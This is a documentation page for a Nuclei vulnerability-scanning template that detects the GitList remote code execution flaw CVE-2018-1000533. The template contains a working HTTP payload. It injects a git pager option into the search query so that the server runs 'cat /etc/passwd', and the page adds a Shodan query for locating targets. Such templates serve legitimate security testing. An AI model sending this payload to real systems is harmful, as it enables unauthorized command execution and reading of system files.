Skip to content
Nuclei Templates

GitList < 0.6.0 Remote Code Execution

ID: CVE-2018-1000533

Severity: critical

Author: pikpikcu

Tags: cve,cve2018,git,gitlist,vulhub,rce

Description

Section titled “Description”

klaussilveira GitList version <= 0.6 contains a passing incorrectly sanitized input via the searchTree function that can result in remote code execution.

YAML Source

Section titled “YAML Source”
id: CVE-2018-1000533


info:
  name: GitList < 0.6.0 Remote Code Execution
  author: pikpikcu
  severity: critical
  description: klaussilveira GitList version <= 0.6 contains a passing incorrectly sanitized input via the `searchTree` function that can result in remote code execution.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade GitList to version 0.6.0 or later to mitigate this vulnerability.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000533
    - https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html
    - https://github.com/klaussilveira/gitlist/commit/87b8c26b023c3fc37f0796b14bb13710f397b322
    - https://github.com/superlink996/chunqiuyunjingbachang
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-1000533
    cwe-id: CWE-20
    epss-score: 0.97242
    epss-percentile: 0.99831
    cpe: cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: gitlist
    product: gitlist
    shodan-query: cpe:"cpe:2.3:a:gitlist:gitlist"
  tags: cve,cve2018,git,gitlist,vulhub,rce


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /{{path}}/tree/a/search HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        query=--open-files-in-pager=cat%20/etc/passwd


    matchers:
      - type: word
        part: body
        words:
          - "root:/root:/bin/bash"


    extractors:
      - type: regex
        name: path
        group: 1
        regex:
          - '<span class="name">(.*?)</span>'
        internal: true
        part: body
# digest: 490a0046304402206aedb2448a2fecf7c143daf69652dffa4ed2f679c95909535394a4b1cd3c077802205dc0318a56d273ae9f7db86201493e080b5cb0986d5ac0bd0b4e85fee2484bd8:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-1000533.yaml"

View on Github